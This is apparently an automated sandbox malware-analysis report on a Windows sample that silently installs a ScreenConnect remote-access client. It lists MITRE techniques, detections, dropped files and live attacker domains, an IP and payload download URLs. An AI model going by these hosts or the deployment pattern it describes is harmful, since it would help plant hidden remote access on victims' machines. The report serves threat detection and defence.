                  Source: Yara matchFile source: 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2495260176.000001D4592FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 1556, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 4332, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		121
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  Inhibit System Recovery
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		2
                  Windows Service                  		2
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager34
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Software Packing                  		NTDS51
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  Timestomp                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials51
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Search Order Hijacking                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Masquerading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
                  Virtualization/Sandbox Evasion                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Hidden Users                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Bootkit                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542314 Sample: khwHsyfsJ1.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 66 48 secure.stansup.com 2->48 50 kjh231a.zapto.org 2->50 52 4 other IPs or domains 2->52 62 Multi AV Scanner detection for submitted file 2->62 64 .NET source code references suspicious native API functions 2->64 66 Detected potential unwanted application 2->66 68 2 other signatures 2->68 9 khwHsyfsJ1.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        14 svchost.exe 8 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 19 dfsvc.exe 133 107 9->19         started        23 WerFault.exe 19 16 9->23         started        72 Reads the Security eventlog 11->72 74 Reads the System eventlog 11->74 76 Deletes keys which are related to windows safe boot (disables safe mode boot) 11->76 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 14->28         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 dnsIp8 54 kjh231a.zapto.org 79.110.49.185, 443, 49707, 49713 OTAVANET-ASCZ Germany 19->54 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 44 13 other files (none is malicious) 19->44 dropped 30 ScreenConnect.WindowsClient.exe 19 9 19->30         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 23->42 dropped 70 Contains functionality to hide user accounts 25->70 file9 signatures10 process11 signatures12 78 Contains functionality to hide user accounts 30->78 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 56 Detected unpacking (creates a PE file in dynamic memory) 33->56 58 Contains functionality to hide user accounts 33->58 60 Enables network access during safeboot for specific services 33->60

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  khwHsyfsJ1.exe24%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.w3.or0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                  http://www.w3.o0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/09/policy0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  secure.stansup.com
                  		79.110.49.185
                  		truefalse
                    		unknown
                    kjh231a.zapto.org
                    		79.110.49.185
                    		truefalse
                      		unknown
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      		84.201.210.34
                      		truefalse
                        		unknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                            		unknown
                            https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                              		unknown
                              https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                		unknown
                                https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                  		unknown
                                  https://secure.stansup.com/Bin/ScreenConnect.ClientService.exefalse
                                    		unknown
                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exefalse
                                      		unknown
                                      https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllfalse
                                        		unknown
                                        https://secure.stansup.com/Bin/ScreenConnect.Client.dllfalse
                                          		unknown
                                          https://secure.stansup.com/Bin/ScreenConnect.Windows.dllfalse
                                            		unknown
                                            https://secure.stansup.com/Bin/ScreenConnect.Client.manifestfalse
                                              		unknown
                                              https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exefalse
                                                		unknown
                                                https://secure.stansup.com/Bin/ScreenConnect.Core.dllfalse
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.application9ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.applicationDdfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClidfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://secure.stansup.com/Bindfsvc.exe, 00000002.00000002.2495433381.000001D45930D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://secure.stansup.comdfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.application1dfsvc.exe, 00000002.00000002.2494183832.000001D4591F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://secure.stansup.cdfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdencesvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://secure.staP2dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationYScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1830621372.0000000001130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517366863.00000189C5F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exeadfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000002.00000002.2474748099.000001D43EB8A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1904297758.0000000001982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://Passport.NET/tb_svchost.exe, 00000008.00000002.2690157641.00000189C644A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddsvchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configdZdfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.w3.(svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://secure.stansadfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://account.live.com/msangcwamsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468931306.00000189C5F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.w3.orScreenConnect.WindowsClient.exe, 0000000A.00000002.1831972268.000000001B690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://crl.ver)svchost.exe, 00000007.00000002.2690801617.000001E0EC80F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://passport.net/tbsvchost.exe, 00000008.00000002.2690008650.00000189C641B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689076222.00000189C5683000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690289231.00000189C6487000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689329817.00000189C56EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://secure.staPdfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://secure.stansup.com/BkhwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Windodfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAsvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxmlsvchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or62C6HAPT.log.2.drfalse
                                                                                                                                  		unknown
                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:psvchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Client.manifestUdfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://g.live.com/odclientsettings/Prod-C:edb.log.7.drfalse
                                                                                                                                        		unknown
                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.ClientService.exeOdfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/sconsvchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://crl3.digicekhwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://login.ecursvchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://account.live.com/Wizard/Password/Change?id=806013svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.manifestn1CDdfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhemasvchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://secure.stansup.com/Bin/ScreeTXdfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:Ssvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000008.00000003.1517183349.00000189C5F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Windows.dll#dfsvc.exe, 00000002.00000002.2495464552.000001D459317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
